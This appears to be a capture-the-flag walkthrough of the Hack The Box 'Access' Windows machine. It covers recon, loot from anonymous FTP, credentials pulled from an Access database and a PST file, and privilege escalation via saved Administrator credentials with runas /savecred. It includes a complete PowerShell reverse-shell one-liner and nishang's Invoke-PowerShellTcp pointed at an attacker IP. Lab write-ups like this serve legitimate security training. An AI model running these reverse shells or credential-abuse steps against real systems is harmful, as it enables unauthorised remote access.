HACKTHEBOX MACHINES

HTB [Access]


#windows#ACL

RECON 

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet  syn-ack Microsoft Windows XP telnetd
| telnet-ntlm-info:
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp


  • It’s a windows machine and three ports opened
  • Anonymous login is allowed in FTP

  • There’s a single file in each directory
  • Download that first
  • ‘Access Control.zip’ and backup.mdb
  • backup.mdb is Microsoft Access Database
  • The zip file is protected by password

  • So let’s use mdb tools to see is there any password stored in backup.mdb file!
  • There’s a table called auth_user

  • Using the password access4u@security to extract Access Control.zip gives a file named Access Control.pst

  • Extract it

  • We got some creds security:4Cc3ssC0ntr0ller

INITIAL FOOTHOLD

  • Use this creds in telnet to login, there we can execute commands
  • This shell is superslow and we can’t able to delete letters
  • So I’m gonna use a powershell oneliner to get a rev shell to my machine


powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.10',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


PRIVESC

  • This file seems interesting, it’s a shortcut file for ZKAccess 3.5 Security System software
  • It’s a security management software that provides various features such as access control, time and attendance management, and alarm monitoring

  • They’re using runas.exe
  • Note user:ACCESS\Administrator /savecred

The /savecred parameter in the runas command in Windows allows the user to save the credentials used for the specified command

  • We can use cmdkey to list the saved credentials, so they saved credentials for Administrator here
  • Now we can use runas command to run commands as Administrator using this /savecred parameter
  • The above payload which we used to get not worked, so I’m gonna use nishang/Shells/Invoke-PowerShellTcp.ps1
  • You can download this in github
  • Add Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.10 -Port 1337 to the end of the powershell script and start a python server

  • And we got the shell!!

Hack The Box

It would be appreciated if you give me a respect+ on HTB